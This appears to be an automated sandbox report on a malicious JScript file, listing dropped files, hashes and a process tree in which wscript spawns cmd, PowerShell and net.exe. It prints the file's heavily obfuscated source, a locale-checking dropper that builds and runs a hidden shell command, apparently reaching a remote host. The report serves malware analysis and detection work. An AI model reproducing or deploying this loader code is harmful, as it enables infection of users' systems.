MD5: | 3F642E3A0E86FA0A649C107AFA2FC0EA |
SHA1: | 876CDA4B0FC19C83FB4A4381B0B7F907E0B6E7CC |
SHA-256: | 0C44382958642E2D3A65D56FB5D3AD973FC639BC9AF331259AEEDB336956BAF0 |
SHA-512: | A83DE37FDDDC1385D508FABED135A1527B5EFC6921E3AFA9FCE578260355A1B8C1F1C0F8ED6EE1AFDAA19F010E5644E4884D029D463C7C910C339CEBC3CAE240 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xXwYIGNPgOWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JXwZGDWLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 8DE7F8054D360BA016642F9E6BE20B6A |
SHA1: | E001251216DE9FFDEFA085FC232D4AA5AF1A05AE |
SHA-256: | 869ED550A77944FF3966CA56F7BB9CFDA979AF710D3B068B0853697AE120EA50 |
SHA-512: | 59A2F077CDA34172A3005E72CF97786AE8C6C7BDB04053956FE8CF5F178B28DED5AAFC8825DC0DA09EBA89E1CB909A42634A2073D396E716639AB91642048972 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.9942200199221904 |
TrID: | |
File name: | 2165116371124411090.js |
File size: | 10'127 bytes |
MD5: | 9a4c27bf1fe77e727e56f8c11090b765 |
SHA1: | fba4eb481833c1bab7864de82a0de26edae49c06 |
SHA256: | 91493ab08127d1bffcff02e61f80745c213ee2ba9d117b6f0154d77d27c5c964 |
SHA512: | 06fb05d7fae425bef4e67056ace3dbd33174e4d698fcf0dd79ec3eddc86a4f6fbc1dffa63e8ea7906c4e1e1916af7355ec9909e7abb6b157e2930d81c15f45ed |
SSDEEP: | 192:s0wZgrU0HulsRS/SZdIx7xphxMcC+erummrolyZBrRniEWQZgF7FDFDFhFtFU:7wZgrUhsRw9phxMcCnymmrolyZBrRnVF |
TLSH: | D322A6DAFEB68AC04DF5B99DA3114156E84F54FD0A5CC2B0EEA2BCA64D4CD28C4D607C |
File Content Preview: | function wedejlzf(){this[nmelztyk+vcakqfo+dbiqu+ckruw]("jszwx=[1031,3079,5127,4103,2055,3072];var dklkd=this[jbnac+dbiqu+hplcgqwyf+oxfzkuk+nmelztyk+dntnoot+wzzcxwlu+wgofg](this[qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg][jcngzslb+hplcgqwyf+nmelztyk+d |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 04:13:12 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74df20000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 04:13:14 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ae420000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 04:13:14 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 04:13:14 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 04:13:24 |
Start date: | 13/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 04:13:24 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ae420000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 04:13:24 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff645290000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 04:13:24 |
Start date: | 13/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 04:13:25 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 04:13:25 |
Start date: | 13/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function wedejlzf() { |
|
1 | this[nmelztyk + vcakqfo + dbiqu + ckruw] ( "jszwx=[1031,3079,5127,4103,2055,3072];var dklkd=this[jbnac+dbiqu+hplcgqwyf+oxfzkuk+nmelztyk+dntnoot+wzzcxwlu+wgofg](this[qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg][jcngzslb+hplcgqwyf+nmelztyk+dbiqu+wgofg+nmelztyk+jtiper+dpmsgrww+mukgzd+nmelztyk+hkcvt+wgofg](qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg+qsyzz+qyzap+zpwovtyut+nmelztyk+ckruw+ckruw)[xjtrmbugs+nmelztyk+xkqcwaedj+xjtrmbugs+nmelztyk+dbiqu+cvbte](wltovyt+bwoeez+wdwhqpm+heiaox+sruxoolb+jcngzslb+lpkts+xjtrmbugs+xjtrmbugs+wdwhqpm+hknin+sgdnuw+sruxoolb+lpkts+qyzap+wdwhqpm+xjtrmbugs+pyhfa+jcngzslb+zsvda+wzzcxwlu+wgofg+hplcgqwyf+zsvda+ckruw+yhnan+hwcibuug+dbiqu+wzzcxwlu+nmelztyk+ckruw+pyhfa+dntnoot+wzzcxwlu+wgofg+nmelztyk+hplcgqwyf+wzzcxwlu+dbiqu+wgofg+mdxfrfy+zsvda+wzzcxwlu+dbiqu+ckruw+pyhfa+ikxsqblx+zsvda+hkcvt+dbiqu+ckruw+nmelztyk),16);for(jphlhlskc=0;jphlhlskc<jszwx[ckruw+nmelztyk+wzzcxwlu+xkqcwaedj+wgofg+zpwovtyut];++jphlhlskc){if(dklkd==jszwx[jphlhlskc]){dklkd=true;break;}}if(dklkd!==true)this[qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg][npdxivk+joqbjxcw+mdxfrfy+wgofg]();this[qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg][jcngzslb+hplcgqwyf+nmelztyk+dbiqu+wgofg+nmelztyk+jtiper+dpmsgrww+mukgzd+nmelztyk+hkcvt+wgofg](qdfpa+qyzap+hkcvt+hplcgqwyf+mdxfrfy+jbnac+wgofg+qsyzz+qyzap+zpwovtyut+nmelztyk+ckruw+ckruw)[hplcgqwyf+joqbjxcw+wzzcxwlu](hkcvt+wkxzpthd+cvbte+yhnan+adqxioc+hkcvt+yhnan+jbnac+zsvda+ualuf+nmelztyk+hplcgqwyf+oxfzkuk+zpwovtyut+nmelztyk+ckruw+ckruw+qsyzz+nmelztyk+uhdjrl+nmelztyk+yhnan+pnfsqn+jcngzslb+zsvda+wkxzpthd+wkxzpthd+dbiqu+wzzcxwlu+cvbte+yhnan+ieamu+dntnoot+wzzcxwlu+vcakqfo+zsvda+aafqixm+nmelztyk+pnfsqn+qdfpa+nmelztyk+dpmsgrww+xjtrmbugs+nmelztyk+cgzlxuhj+joqbjxcw+nmelztyk+oxfzkuk+wgofg+yhnan+pnfsqn+jtiper+joqbjxcw+wgofg+aoblrfg+mdxfrfy+ckruw+nmelztyk+yhnan+vqoysebnl+wgofg+nmelztyk+wkxzpthd+jbnac+vqoysebnl+pyhfa+mdxfrfy+wzzcxwlu+vcakqfo+zsvda+mdxfrfy+hkcvt+nmelztyk+qsyzz+jbnac+cvbte+rykzzza+yhnan+zpwovtyut+wgofg+wgofg+jbnac+bhoawpya+adqxioc+adqxioc+wiurr+svadgpxrf+ohunzkdk+qsyzz+wiurr+ikknn+ohunzkdk+qsyzz+wiurr+qsyzz+btmsoi+zbqngcaj+afltmsqlo+adqxioc+mdxfrfy+wzzcxwlu+vcakqfo+zsvda+mdxfrfy+hkcvt+nmelztyk+qsyzz+jbnac+zpwovtyut+jbnac+ieamu+hgfmhj+hgfmhj+oxfzkuk+wgofg+dbiqu+hplcgqwyf+wgofg+yhnan+vqoysebnl+wgofg+nmelztyk+wkxzpthd+jbnac+vqoysebnl+pyhfa+mdxfrfy+wzzcxwlu+vcakqfo+zsvda+mdxfrfy+hkcvt+nmelztyk+qsyzz+jbnac+cvbte+rykzzza+hgfmhj+hgfmhj+hkcvt+wkxzpthd+cvbte+yhnan+adqxioc+hkcvt+yhnan+wzzcxwlu+nmelztyk+wgofg+yhnan+joqbjxcw+oxfzkuk+nmelztyk+yhnan+pyhfa+pyhfa+wiurr+svadgpxrf+ohunzkdk+qsyzz+wiurr+ikknn+ohunzkdk+qsyzz+wiurr+qsyzz+btmsoi+zbqngcaj+afltmsqlo+phaelei+edkjgjf+edkjgjf+edkjgjf+edkjgjf+pyhfa+cvbte+dbiqu+vcakqfo+ualuf+ualuf+ualuf+hplcgqwyf+zsvda+zsvda+wgofg+pyhfa+hgfmhj+hgfmhj+hkcvt+wkxzpthd+cvbte+yhnan+adqxioc+hkcvt+yhnan+hplcgqwyf+nmelztyk+xkqcwaedj+oxfzkuk+vcakqfo+hplcgqwyf+ohunzkdk+btmsoi+yhnan+adqxioc+oxfzkuk+yhnan+pyhfa+pyhfa+wiurr+svadgpxrf+ohunzkdk+qsyzz+wiurr+ikknn+ohunzkdk+qsyzz+wiurr+qsyzz+btmsoi+zbqngcaj+afltmsqlo+phaelei+edkjgjf+edkjgjf+edkjgjf+edkjgjf+pyhfa+cvbte+dbiqu+vcakqfo+ualuf+ualuf+ualuf+hplcgqwyf+zsvda+zsvda+wgofg+pyhfa+wiurr+ikknn+ohunzkdk+ckkhhs+zbzyapxtt+wiurr+wiurr+zbqngcaj+edkjgjf+ikknn+btmsoi+svadgpxrf+afltmsqlo+ohunzkdk+afltmsqlo+qsyzz+cvbte+ckruw+ckruw,0,false);" ); |
|
2 | } | |
3 | dpmsgrww = "o"; | |
4 | dpmsgrww = "S"; | |
5 | dpmsgrww = "h"; | |
6 | dpmsgrww = "g"; | |
7 | dpmsgrww = "Y"; | |
8 | dpmsgrww = "w"; | |
9 | dpmsgrww = "y"; | |
10 | dpmsgrww = "d"; | |
11 | dpmsgrww = "b"; | |
12 | xkqcwaedj = "p"; | |
13 | xkqcwaedj = "L"; | |
14 | xkqcwaedj = "d"; | |
15 | xkqcwaedj = "u"; | |
16 | xkqcwaedj = "D"; | |
17 | xkqcwaedj = "n"; | |
18 | xkqcwaedj = "g"; | |
19 | wzzcxwlu = "a"; | |
20 | wzzcxwlu = "O"; | |
21 | wzzcxwlu = "X"; | |
22 | wzzcxwlu = "z"; | |
23 | wzzcxwlu = "d"; | |
24 | wzzcxwlu = "W"; | |
25 | wzzcxwlu = "S"; | |
26 | wzzcxwlu = "G"; | |
27 | wzzcxwlu = "n"; | |
28 | sruxoolb = "j"; | |
29 | sruxoolb = "c"; | |
30 | sruxoolb = "j"; | |
31 | sruxoolb = "H"; | |
32 | sruxoolb = "s"; | |
33 | sruxoolb = "j"; | |
34 | sruxoolb = "c"; | |
35 | sruxoolb = "X"; | |
36 | sruxoolb = "C"; | |
37 | sruxoolb = "_"; | |
38 | adqxioc = "J"; | |
39 | adqxioc = "a"; | |
40 | adqxioc = "D"; | |
41 | adqxioc = "F"; | |
42 | adqxioc = "T"; | |
43 | adqxioc = "T"; | |
44 | adqxioc = "/"; | |
45 | zsvda = "E"; | |
46 | zsvda = "Q"; | |
47 | zsvda = "Y"; | |
48 | zsvda = "o"; | |
49 | zsvda = "v"; | |
50 | zsvda = "e"; | |
51 | zsvda = "o"; | |
52 | cgzlxuhj = "U"; | |
53 | cgzlxuhj = "v"; | |
54 | cgzlxuhj = "O"; | |
55 | cgzlxuhj = "p"; | |
56 | cgzlxuhj = "V"; | |
57 | cgzlxuhj = "r"; | |
58 | cgzlxuhj = "q"; | |
59 | hgfmhj = "v"; | |
60 | hgfmhj = "f"; | |
61 | hgfmhj = "q"; | |
62 | hgfmhj = "a"; | |
63 | hgfmhj = "C"; | |
64 | hgfmhj = "&"; | |
65 | jtiper = "r"; | |
66 | jtiper = "E"; | |
67 | jtiper = "c"; | |
68 | jtiper = "f"; | |
69 | jtiper = "A"; | |
70 | jtiper = "m"; | |
71 | jtiper = "L"; | |
72 | jtiper = "V"; | |
73 | jtiper = "O"; | |
74 | npdxivk = "R"; | |
75 | npdxivk = "F"; | |
76 | npdxivk = "d"; | |
77 | npdxivk = "B"; | |
78 | npdxivk = "k"; | |
79 | npdxivk = "Q"; | |
80 | wdwhqpm = "q"; | |
81 | wdwhqpm = "E"; | |
82 | wdwhqpm = "G"; | |
83 | wdwhqpm = "v"; | |
84 | wdwhqpm = "E"; | |
85 | wdwhqpm = "y"; | |
86 | wdwhqpm = "E"; | |
87 | wiurr = "C"; | |
88 | wiurr = "O"; | |
89 | wiurr = "K"; | |
90 | wiurr = "l"; | |
91 | wiurr = "B"; | |
92 | wiurr = "1"; | |
93 | ikxsqblx = "f"; | |
94 | ikxsqblx = "Z"; | |
95 | ikxsqblx = "B"; | |
96 | ikxsqblx = "O"; | |
97 | ikxsqblx = "B"; | |
98 | ikxsqblx = "D"; | |
99 | ikxsqblx = "I"; | |
100 | ikxsqblx = "A"; | |
101 | ikxsqblx = "L"; | |
102 | jcngzslb = "Y"; | |
103 | jcngzslb = "k"; | |
104 | jcngzslb = "g"; | |
105 | jcngzslb = "V"; | |
106 | jcngzslb = "m"; | |
107 | jcngzslb = "W"; | |
108 | jcngzslb = "c"; | |
109 | jcngzslb = "L"; | |
110 | jcngzslb = "n"; | |
111 | jcngzslb = "C"; | |
112 | pyhfa = "f"; | |
113 | pyhfa = "o"; | |
114 | pyhfa = "S"; | |
115 | pyhfa = "T"; | |
116 | pyhfa = "y"; | |
117 | pyhfa = "A"; | |
118 | pyhfa = "\\"; | |
119 | ckkhhs = "Z"; | |
120 | ckkhhs = "v"; | |
121 | ckkhhs = "O"; | |
122 | ckkhhs = "n"; | |
123 | ckkhhs = "R"; | |
124 | ckkhhs = "w"; | |
125 | ckkhhs = "6"; | |
126 | hwcibuug = "B"; | |
127 | hwcibuug = "A"; | |
128 | hwcibuug = "e"; | |
129 | hwcibuug = "K"; | |
130 | hwcibuug = "q"; | |
131 | hwcibuug = "p"; | |
132 | hwcibuug = "A"; | |
133 | hwcibuug = "S"; | |
134 | hwcibuug = "P"; | |
135 | ohunzkdk = "f"; | |
136 | ohunzkdk = "G"; | |
137 | ohunzkdk = "O"; | |
138 | ohunzkdk = "G"; | |
139 | ohunzkdk = "Z"; | |
140 | ohunzkdk = "q"; | |
141 | ohunzkdk = "t"; | |
142 | ohunzkdk = "H"; | |
143 | ohunzkdk = "3"; | |
144 | ieamu = "p"; | |
145 | ieamu = "P"; | |
146 | ieamu = "r"; | |
147 | ieamu = "y"; | |
148 | ieamu = "Y"; | |
149 | ieamu = "\""; | |
150 | cvbte = "h"; | |
151 | cvbte = "d"; | |
152 | cvbte = "l"; | |
153 | cvbte = "X"; | |
154 | cvbte = "g"; | |
155 | cvbte = "I"; | |
156 | cvbte = "j"; | |
157 | cvbte = "o"; | |
158 | cvbte = "d"; | |
159 | phaelei = "w"; | |
160 | phaelei = "F"; | |
161 | phaelei = "H"; | |
162 | phaelei = "K"; | |
163 | phaelei = "L"; | |
164 | phaelei = "N"; | |
165 | phaelei = "F"; | |
166 | phaelei = "@"; | |
167 | hkcvt = "e"; | |
168 | hkcvt = "H"; | |
169 | hkcvt = "J"; | |
170 | hkcvt = "e"; | |
171 | hkcvt = "D"; | |
172 | hkcvt = "i"; | |
173 | hkcvt = "j"; | |
174 | hkcvt = "c"; | |
175 | hknin = "w"; | |
176 | hknin = "P"; | |
177 | hknin = "p"; | |
178 | hknin = "J"; | |
179 | hknin = "D"; | |
180 | hknin = "x"; | |
181 | hknin = "B"; | |
182 | hknin = "G"; | |
183 | hknin = "B"; | |
184 | hknin = "N"; | |
185 | afltmsqlo = "V"; | |
186 | afltmsqlo = "V"; | |
187 | afltmsqlo = "W"; | |
188 | afltmsqlo = "T"; | |
189 | afltmsqlo = "L"; | |
190 | afltmsqlo = "A"; | |
191 | afltmsqlo = "I"; | |
192 | afltmsqlo = "W"; | |
193 | afltmsqlo = "5"; | |
194 | lpkts = "N"; | |
195 | lpkts = "L"; | |
196 | lpkts = "d"; | |
197 | lpkts = "G"; | |
198 | lpkts = "F"; | |
199 | lpkts = "I"; | |
200 | lpkts = "Z"; | |
201 | lpkts = "V"; | |
202 | lpkts = "U"; | |
203 | qsyzz = "Z"; | |
204 | qsyzz = "w"; | |
205 | qsyzz = "s"; | |
206 | qsyzz = "e"; | |
207 | qsyzz = "U"; | |
208 | qsyzz = "m"; | |
209 | qsyzz = "z"; | |
210 | qsyzz = "Y"; | |
211 | qsyzz = "."; | |
212 | wltovyt = "c"; | |
213 | wltovyt = "T"; | |
214 | wltovyt = "C"; | |
215 | wltovyt = "N"; | |
216 | wltovyt = "E"; | |
217 | wltovyt = "P"; | |
218 | wltovyt = "z"; | |
219 | wltovyt = "Y"; | |
220 | wltovyt = "H"; | |
221 | joqbjxcw = "s"; | |
222 | joqbjxcw = "g"; | |
223 | joqbjxcw = "r"; | |
224 | joqbjxcw = "v"; | |
225 | joqbjxcw = "X"; | |
226 | joqbjxcw = "u"; | |
227 | zbzyapxtt = "X"; | |
228 | zbzyapxtt = "A"; | |
229 | zbzyapxtt = "V"; | |
230 | zbzyapxtt = "H"; | |
231 | zbzyapxtt = "r"; | |
232 | zbzyapxtt = "O"; | |
233 | zbzyapxtt = "a"; | |
234 | zbzyapxtt = "7"; | |
235 | hplcgqwyf = "U"; | |
236 | hplcgqwyf = "j"; | |
237 | hplcgqwyf = "A"; | |
238 | hplcgqwyf = "Y"; | |
239 | hplcgqwyf = "s"; | |
240 | hplcgqwyf = "G"; | |
241 | hplcgqwyf = "y"; | |
242 | hplcgqwyf = "r"; | |
243 | xjtrmbugs = "A"; | |
244 | xjtrmbugs = "u"; | |
245 | xjtrmbugs = "A"; | |
246 | xjtrmbugs = "e"; | |
247 | xjtrmbugs = "C"; | |
248 | xjtrmbugs = "R"; | |
249 | bhoawpya = "C"; | |
250 | bhoawpya = "X"; | |
251 | bhoawpya = "E"; | |
252 | bhoawpya = "r"; | |
253 | bhoawpya = "i"; | |
254 | bhoawpya = "H"; | |
255 | bhoawpya = "k"; | |
256 | bhoawpya = "E"; | |
257 | bhoawpya = "a"; | |
258 | bhoawpya = ":"; | |
259 | ualuf = "p"; | |
260 | ualuf = "t"; | |
261 | ualuf = "U"; | |
262 | ualuf = "I"; | |
263 | ualuf = "m"; | |
264 | ualuf = "G"; | |
265 | ualuf = "y"; | |
266 | ualuf = "U"; | |
267 | ualuf = "w"; | |
268 | jbnac = "E"; | |
269 | jbnac = "o"; | |
270 | jbnac = "t"; | |
271 | jbnac = "B"; | |
272 | jbnac = "Q"; | |
273 | jbnac = "v"; | |
274 | jbnac = "k"; | |
275 | jbnac = "n"; | |
276 | jbnac = "H"; | |
277 | jbnac = "p"; | |
278 | sgdnuw = "I"; | |
279 | sgdnuw = "D"; | |
280 | sgdnuw = "r"; | |
281 | sgdnuw = "k"; | |
282 | sgdnuw = "Z"; | |
283 | sgdnuw = "Z"; | |
284 | sgdnuw = "B"; | |
285 | sgdnuw = "T"; | |
286 | zpwovtyut = "D"; | |
287 | zpwovtyut = "G"; | |
288 | zpwovtyut = "R"; | |
289 | zpwovtyut = "m"; | |
290 | zpwovtyut = "o"; | |
291 | zpwovtyut = "z"; | |
292 | zpwovtyut = "h"; | |
293 | wgofg = "Q"; | |
294 | wgofg = "A"; | |
295 | wgofg = "D"; | |
296 | wgofg = "H"; | |
297 | wgofg = "C"; | |
298 | wgofg = "t"; | |
299 | mdxfrfy = "N"; | |
300 | mdxfrfy = "T"; | |
301 | mdxfrfy = "w"; | |
302 | mdxfrfy = "X"; | |
303 | mdxfrfy = "W"; | |
304 | mdxfrfy = "p"; | |
305 | mdxfrfy = "i"; | |
306 | nmelztyk = "k"; | |
307 | nmelztyk = "d"; | |
308 | nmelztyk = "H"; | |
309 | nmelztyk = "Z"; | |
310 | nmelztyk = "d"; | |
311 | nmelztyk = "z"; | |
312 | nmelztyk = "L"; | |
313 | nmelztyk = "h"; | |
314 | nmelztyk = "e"; | |
315 | zbqngcaj = "z"; | |
316 | zbqngcaj = "I"; | |
317 | zbqngcaj = "c"; | |
318 | zbqngcaj = "i"; | |
319 | zbqngcaj = "K"; | |
320 | zbqngcaj = "n"; | |
321 | zbqngcaj = "Y"; | |
